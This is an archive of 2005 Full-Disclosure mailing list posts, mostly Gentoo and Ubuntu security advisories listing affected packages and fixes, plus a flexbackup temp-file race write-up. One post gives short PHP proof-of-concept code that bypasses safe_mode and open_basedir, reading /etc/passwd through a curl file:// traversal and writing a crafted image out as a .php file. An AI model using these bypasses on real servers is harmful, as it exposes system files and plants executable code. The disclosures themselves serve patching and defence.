date:20051017

[Full-disclosure] [ GLSA 200510-14 ] Perl, Qt-UnixODBC, CMake: RUNPATH issues

2005-10-17 Thread Thierry Carrez

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
 Title: Perl, Qt-UnixODBC, CMake: RUNPATH issues
  Date: October 17, 2005
  Bugs: #105719, #105721, #106678
ID: 200510-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple packages suffer from RUNPATH issues that may allow users in
the portage group to escalate privileges.

Background
==

Perl is a stable, cross-platform programming language created by Larry
Wall. Qt-UnixODBC is an ODBC library for Qt. CMake is a cross-platform
build environment.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  dev-lang/perl   5.8.7-r1 = 5.8.7-r1
  *= 5.8.6-r6
  2  dev-db/qt-unixodbc  3.3.4-r1 = 3.3.4-r1
  3  dev-util/cmake  2.2.0-r1 = 2.2.0-r1
  *= 2.0.6-r1
---
 3 affected packages on all of their supported architectures.
---

Description
===

Some packages may introduce insecure paths into the list of directories
that are searched for libraries at runtime. Furthermore, packages
depending on the MakeMaker Perl module for build configuration may have
incorrectly copied the LD_RUN_PATH into the DT_RPATH.

Impact
==

A local attacker, who is a member of the portage group, could create
a malicious shared object in the Portage temporary build directory that
would be loaded at runtime by a dependent executable, potentially
resulting in privilege escalation.

Workaround
==

Only grant portage group rights to trusted users.

Resolution
==

All Perl users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose dev-lang/perl

All Qt-UnixODBC users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-db/qt-unixodbc-3.3.4-r1

All CMake users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose dev-util/cmake

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-14.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] flexbackup default config insecure temporary file creation

2005-10-17 Thread ZATAZ Audits


#

flexbackup default config insecure temporary file creation

Vendor: http://flexbackup.sourceforge.net/
Advisory: http://www.zataz.net/adviso/flexbackup-09192005.txt
Vendor informed: yes
Exploit available: yes
Impact : low
Exploitation : low

#

The vulnerabilities ared due to insecure temporary files creations due 
to a default config.


They are symlink attacks to create arbitrary files with the privileges 
of the user running the affected script, sensitive informations 
disclosure, possible local or remote arbitrary commands execution.


##
Versions:
##

flexbackup = 1.2.1

##
Solution:
##

Change default config $tmpdir

#
Timeline:
#

Discovered : 2005-09-06
Vendor notified : 2005-09-19
Vendor response : none
Vendor fix : none
Vendor Sec report ([EMAIL PROTECTED]) : 2005-09-30
Disclosure : 2005-10-15

#
Technical details :
#

Vulnerable code :
-

* In /etc/flexbackup.conf :

$tmpdir = '/tmp';

* Into flexbackup :

checkvar(\$cfg::tmpdir,'tmpdir','exist','/tmp');

If tmpdir is not defined /tmp is used by default, but here into conf 
file tmpdir is by default set to /tmp


5229 my $tmp_script = $cfg::tmpdir/buftest.$host.$PROCESS_ID.sh;

5236 # Create a script which tests the buffer program
5237 open(SCR, $tmp_script) || die;
5238 print SCR #!/bin/sh\n;
5239 print SCR tmp_data=/tmp/bufftest\$\$.txt\n;
5240 print SCR tmp_err=/tmp/bufftest\$\$.err\n;
5241 print SCR echo testme  \$tmp_data\n;
5242 print SCR $buffer_cmd  /dev/null 2 \$tmp_err  \$tmp_data\n;
5243 print SCR res=\$?\n;
5244 print SCR out=\`cat \$tmp_err\`\n;
5245 print SCR if [ \$res -eq 0 ]; then\n;
5246 print SCRecho successful\n;
5247 print SCR else\n;
5248 print SCRecho \unsuccessful: exit code \$res: \$out\ \n;
5249 print SCR fi\n;
5250 print SCR rm -f \$tmp_data \$tmp_err\n;
5251 close(SCR);

Here we have possible symlink attack (race condition), and also 
possibility to create a untrusted script into the tmp_script (race 
condition).


The script how is created is also vulnerable to possible symlink attack 
(race condition).


5253 if ($host eq 'localhost') {
5254 print $::msg | Checking '$cfg::buffer' on this machine... ;
5255 $pipecmd = sh $tmp_script ;
5256 } else {
5257 print $::msg | Checking '$cfg::buffer' on host $host... ;
5258 $pipecmd =  cat $tmp_script | ($::remoteshell $host 'cat 
$tmp_script; sh $tmp_script; rm -f $tmp_script');

We see here that the untrusted script could be executed on localhost or 
remote

host.

5446 my $tmp1 = $cfg::tmpdir/test1.$PROCESS_ID;
5447 my $tmp2 = $cfg::tmpdir/test2.$PROCESS_ID;
5448 my $tmp3 = $cfg::tmpdir/test3.$PROCESS_ID;

Here the $cfg::pad_blocks should be false to exploit the possible 
symlink attack (race condition). By default in the conf file pad_blocks 
is true. No risk if no configuration modification.


359 if (defined($::pkgdelta)) {
360 if (defined($::local)) {
361 list_packages('localhost');
362 find_packaged_files('localhost');
363 find_changed_files('localhost');
364 }
365 foreach my $host (keys %::remotehosts) {
366 list_packages($host);
367 find_packaged_files($host);
368 find_changed_files($host);
369 }
370 $::pkgdelta_filelist = $cfg::tmpdir/pkgdelta.$PROCESS_ID;
371 line();
372 }

Here we have possible symlink attack (race condition)

619 my $exitscript = $cfg::tmpdir/collectexit.$PROCESS_ID.sh;
620 my $result = $cfg::tmpdir/exitstatus.$PROCESS_ID;

841 unlink($result);
842 open(SCR,  $exitscript) || die;
843 print SCR '#!/bin/sh' . \n;
844 print SCR '$@' . \n;;
845 print SCR '[ $? = 0 ] || echo $@  ' . $result . \n;
846 close(SCR);
847 chmod(0755, $exitscript);
848
849 push(@cmds, [ ! -e $result ]);
850 }

This one is more difficult to race.


#
Related :
#

Bug report : http://bugs.gentoo.org/show_bug.cgi?id=105000
CVE : CAN-2005-2965

#
Credits :
#

Eric Romang ([EMAIL PROTECTED] - ZATAZ Audit) - Gentoo Security Scout
Thxs to Gentoo Security Team.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-206-1] Lynx vulnerability

2005-10-17 Thread Martin Pitt

===
Ubuntu Security Notice USN-206-1   October 17, 2005
lynx vulnerability
CAN-2005-3120
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

lynx

The problem can be corrected by upgrading the affected package to
version 2.8.5-1ubuntu1.1 (for Ubuntu 4.10), 2.8.5-2ubuntu0.5.04 (for
Ubuntu 5.04), or 2.8.5-2ubuntu0.5.10 (for Ubuntu 5.10).  In general, a
standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Ulf Harnhammar discovered a remote vulnerability in Lynx when
connecting to a news server (NNTP). The function that added missing
escape chararacters to article headers did not check the size of the
target buffer. Specially crafted news entries could trigger a buffer
overflow, which could be exploited to execute arbitrary code with the
privileges of the user running lynx. In order to exploit this, the
user is not even required to actively visit a news site with Lynx
since a malicious HTML page could automatically redirect to an nntp://
URL with malicious news items.


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.diff.gz
  Size/MD5:17668 c5251ad9cead60e416cf21a461371877
http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.dsc
  Size/MD5:  620 4b4310912f7f76fe01cf8312707be244
http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
  Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_amd64.deb
  Size/MD5:  1882872 8be361fa3eead1e76cbbf2426c255c8b

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_i386.deb
  Size/MD5:  1833368 d481856973186dd5d432e1102c49a917

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_powerpc.deb
  Size/MD5:  1878484 1496a6331a4666295bd89703e509037a

Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.diff.gz
  Size/MD5:18015 6171994c6c8f67d84267aa69d00ba292

http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.dsc
  Size/MD5:  626 08ff9f5a955222f051e4e78101ef7c40
http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
  Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_amd64.deb
  Size/MD5:  1881886 74bc70c3731c903e69fd74eb0a6d2d68

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_i386.deb
  Size/MD5:  1832038 f2e333289856566f93f19ca8fd0c5dfd

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_powerpc.deb
  Size/MD5:  1878380 6440d4eae5fadef31aaf21c5396ef401

Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.diff.gz
  Size/MD5:18015 0f7b6e508094dabd59bee9018b368523

http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.dsc
  Size/MD5:  626 2a90195b05000a7f318eb04386d1ad1c
http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
  Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_amd64.deb
  Size/MD5:  1901120 c2e0da03f20b892aaea81d0f0588f7b1

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_i386.deb
  Size/MD5:  1833214 7c021c0b0667d3aedc8479579d52e5ad

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_powerpc.deb
  Size/MD5:  1881080 5ef72d193817f616e99f01113f6053dd


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-207-1] PHP vulnerability

2005-10-17 Thread Martin Pitt

===
Ubuntu Security Notice USN-207-1   October 17, 2005
php4 vulnerability
CAN-2005-3054
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

libapache-mod-php4
libapache2-mod-php4

The problem can be corrected by upgrading the affected package to
version 4:4.3.8-3ubuntu7.13 (for Ubuntu 4.10), or
4:4.3.10-10ubuntu4.2 (for Ubuntu 5.04). In general, a standard system
upgrade is sufficient to effect the necessary changes.

Details follow:

A bug has been found in the handling of the open_basedir directive
handling. Contrary to the specification, the value of open_basedir
was handled as a prefix instead of a proper directory name even if it
was terminated by a slash ('/'). For example, this allowed PHP scripts
to access the directory /home/user10 when open_basedir was configured
to '/home/user1/'.


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8-3ubuntu7.13.diff.gz
  Size/MD5:   620743 3b06c0da0313bc59be31ac77ead260bc

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8-3ubuntu7.13.dsc
  Size/MD5: 1626 031af3bb3149f3f4e651a1582d9aee09
http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8.orig.tar.gz
  Size/MD5:  4832570 dd69f8c89281f088eadf4ade3dbd39ee

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.8-3ubuntu7.13_all.deb
  Size/MD5:   332792 ef203ed6e04985389038a2668e2b2bae

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-pear_4.3.8-3ubuntu7.13_all.deb
  Size/MD5:   334636 40cb1635e3ed9860d210cb5054e76332

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:  1689722 cdeaf5cd97840a91b346ff121e00e291

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:  3198778 8cad2a9376b8483ab6873255274a258f

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-curl_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:17270 321f4676bd3c2bc286e1a726a93ab4c9

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-domxml_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:40434 e058a0198eafea4d8a322f84aa33bb6e

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-gd_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:33612 ad726de3dfdbcacdcde3d90cdf851770

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-ldap_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:21236 2f0ab9a2891bbaf322c67e88b65f4c7a

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mcal_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:18406 f37ed15fb35f433726922d67d0463438

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mhash_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5: 7992 8b013d8ee95fb7563aaef62e9c05251e

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mysql_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:23108 7b3c7f8e89c97557498189719ef30ec0

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-odbc_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:28326 ad745d29d153db18995099efafdd3128

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-recode_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5: 7618 aa19f54e0d7294cbf5cb1f8f976963f0

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-snmp_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:12970 3e592760088678bb91e3767762bc43f5

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-sybase_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:21512 a3190823cdb28c7d27da7a5f1f260569

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-xslt_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:17252 219742cd538690f92d24a82c074fba28

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4_4.3.8-3ubuntu7.13_amd64.deb
  Size/MD5:  1705532 9f6543c2bad3f2a1eae0175ed4938c91

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.8-3ubuntu7.13_i386.deb
  Size/MD5:  1631536 b533fecf692aa471bbdc7c2125ed1e3f

http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.8-3ubuntu7.13_i386.deb
  Size/MD5:  3044892 60f5e35863ed1210762dd10cc245a8ff

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-curl_4.3.8-3ubuntu7.13_i386.deb
  Size/MD5:16852 fc06a8fc17ff7d820874ea9be1bcc93c

http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-domxml_4.3.8-3ubuntu7.13_i386.deb
  Size/MD5:35556 c3b525c920b3d45c332e4ae90e5ba3d3

[Full-disclosure] [USN-208-1] graphviz vulnerability

2005-10-17 Thread Martin Pitt

===
Ubuntu Security Notice USN-208-1   October 17, 2005
graphviz vulnerability
CAN-2005-2965
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

graphviz

The problem can be corrected by upgrading the affected package to
version 2.2-1ubuntu0.1.  In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Javier Fernández-Sanguino Peña discovered that the dotty tool
created and used temporary files in an insecure way. A local attacker
could exploit this with a symlink attack to create or overwrite
arbitrary files with the privileges of the user running dotty.


  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1.diff.gz
  Size/MD5:   207632 5e836a324f059215f8d0daaa9d469107

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1.dsc
  Size/MD5:  788 7c934df6c6a84e937a7060d9743d1c29

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2.orig.tar.gz
  Size/MD5:  4379295 9275d30695a5c22f360acbef7b85acd3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_amd64.deb
  Size/MD5:   147494 2b23526fde607848990ee8b931ea9e0e

http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_amd64.deb
  Size/MD5:  1079078 846c09a610e9c7533c34be24ffd35524

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_amd64.deb
  Size/MD5:  1026506 9f08f1dba4f6e94320600d5c4d043d83

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_i386.deb
  Size/MD5:   147500 beb9f9a7863864a0da2c829eb4688793

http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_i386.deb
  Size/MD5:  1079084 58c7bd99908e4d61e946dd82b7000f12

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_i386.deb
  Size/MD5:   947778 7e0fe2c149954e64cc6fdceaa5ae5bec

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_powerpc.deb
  Size/MD5:   147508 2c786f652e59e9379e120d7065b5bca5

http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_powerpc.deb
  Size/MD5:  1079120 e20fb8adb1c98c784dd5016fda1df8d3

http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_powerpc.deb
  Size/MD5:  1075524 2d189fbb333fe89d00dd48a16dc27fc1


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200510-16 ] phpMyAdmin: Local file inclusion vulnerability

2005-10-17 Thread Sune Kloppenborg Jeppesen

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: phpMyAdmin: Local file inclusion vulnerability
  Date: October 17, 2005
  Bugs: #108939
ID: 200510-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


phpMyAdmin contains a local file inclusion vulnerability that may lead
to the execution of arbitrary code.

Background
==

phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the web.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  dev-db/phpmyadmin  2.6.4_p2  = 2.6.4_p2

Description
===

Maksymilian Arciemowicz reported that in
libraries/grab_globals.lib.php, the $__redirect parameter was not
correctly validated. Systems running PHP in safe mode are not affected.

Impact
==

A local attacker may exploit this vulnerability by sending malicious
requests, causing the execution of arbitrary code with the rights of
the user running the web server.

Workaround
==

Run PHP in safe mode.

Resolution
==

All phpMyAdmin users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-db/phpmyadmin-2.6.4_p2

References
==

  [ 1 ] PMASA-2005-4
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-4

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgpezWirBvgU6.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-208-1] SSH server vulnerability

2005-10-17 Thread Martin Pitt

===
Ubuntu Security Notice USN-208-1   October 17, 2005
openssh vulnerability
CAN-2005-2798
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

openssh-server

The problem can be corrected by upgrading the affected package to
version 1:3.8.1p1-11ubuntu3.2 (for Ubuntu 4.10), or 1:3.9p1-1ubuntu2.1
(for Ubuntu 5.04).  In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

An information disclosure vulnerability has been found in the SSH
server. When the GSSAPIAuthentication option was enabled, the SSH
server could send GSSAPI credentials even to users who attempted to
log in with a method other than GSSAPI. This could inadvertently
expose these credentials to an untrusted user.

Please note that this does not affect the default configuration of the
SSH server.


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1-11ubuntu3.2.diff.gz
  Size/MD5:   145915 b3fde6ad57fa71c6fedd0d857a41b98d

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1-11ubuntu3.2.dsc
  Size/MD5:  878 24b7a0d1b0bc1b12b4bfcdbe6523175f

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1.orig.tar.gz
  Size/MD5:   795948 9ce6f2fa5b2931ce2c4c25f3af9ad50d

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_3.8.1p1-11ubuntu3.2_all.deb
  Size/MD5:30068 9ef84fcec461c2890a1623499383b845

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_amd64.udeb
  Size/MD5:   159440 464c3d1ddad5e743c3f87fab0801bd91

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_amd64.deb
  Size/MD5:   524028 51bda380ea97ef5d49d475b4d210fb6d

http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_amd64.udeb
  Size/MD5:   176150 f0456146f631cb925407693de6c707ae

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_amd64.deb
  Size/MD5:   263790 a5014d5e2e28be860944fee7087c2d30

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_amd64.deb
  Size/MD5:53286 933c38274907edc3033e5728beb8a7f0

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_i386.udeb
  Size/MD5:   133700 91e3983782270ba83ead5fdf75cf6056

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_i386.deb
  Size/MD5:   473980 57c5dd711cb4bba5af54b377ddf25727

http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_i386.udeb
  Size/MD5:   146854 94bae5597a13d613d1a7fe6d34e8312c

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_i386.deb
  Size/MD5:   241586 3761cc46ab91630196103390b86d36f4

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_i386.deb
  Size/MD5:52956 35adb2d5dafd2b25d0aaa73c87b8231c

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_powerpc.udeb
  Size/MD5:   151096 34eaad307c336ec22cdd062ab8343918

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_powerpc.deb
  Size/MD5:   520822 be831a5152a07823c8a3642de79c23c3

http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_powerpc.udeb
  Size/MD5:   160176 aae5f5a422bc2086c78581b05f6eb71b

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_powerpc.deb
  Size/MD5:   257946 0960bfb03e1682d28086d5b11bc55f51

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_powerpc.deb
  Size/MD5:54404 5729a05da0f88afe145a38ac80c92ae5

Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.1.diff.gz
  Size/MD5:   139063 63d2f62b292d2ac8baec90117878dbbd

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.1.dsc
  Size/MD5:  866 a4fce3d18d282f646942b15fb7a26915

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1.orig.tar.gz
  Size/MD5:   832804 530b1dcbfe7a4a4ce4959c0775b85a5a

  Architecture independent packages:

[Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

2005-10-17 Thread peter MC tachatte

There is a vulnerability (Safedir Restriction Bypass)identified within the GD extension affectingthe following functions:- imagegif()- imagepng()- imagejpeg()in /ext/gd/gd.c line 1647
Which is now fixed in the cvshttp://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786
POC:
with an image like http://81.57.125.106/~slythers/file.gif
?php  $im = imagecreatefromgif(file.gif);  imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');?curl openbasedir and safemode bypass.
POC:

?php
mkdir(./.$_SERVER[SCRIPT_NAME].?);$ch = curl_init(file://.$_SERVER[SCRIPT_FILENAME].?/../../../../../../../../../../../etc/passwd
);
$file=curl_exec($ch);
echo $file;
?
As you notice, we can bypass the safedir which leads to access to anyfiles on any shared servers.This is fixed in the cvs.
[EMAIL PROTECTED]
greets: david coallier [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Kerio Personal Firewall and Kerio Server Firewall FWDRV driver Local Denial of Service

2005-10-17 Thread Paul Laudanski

On Thu, 13 Oct 2005, Piotr Bania wrote:

   Kerio Technologies Kerio Personal Firewall and Kerio Server
  Firewall FWDRV driver
   Local denial of service
   by Piotr Bania [EMAIL PROTECTED]

Part of the problem here is that KPF has reached end of life and will no 
longer be developed.

-- 
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops(SM), http://castlecops.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200510-14 ] Perl, Qt-UnixODBC, CMake: RUNPATH issues

[Full-disclosure] flexbackup default config insecure temporary file creation

[Full-disclosure] [USN-206-1] Lynx vulnerability

[Full-disclosure] [USN-207-1] PHP vulnerability

[Full-disclosure] [USN-208-1] graphviz vulnerability

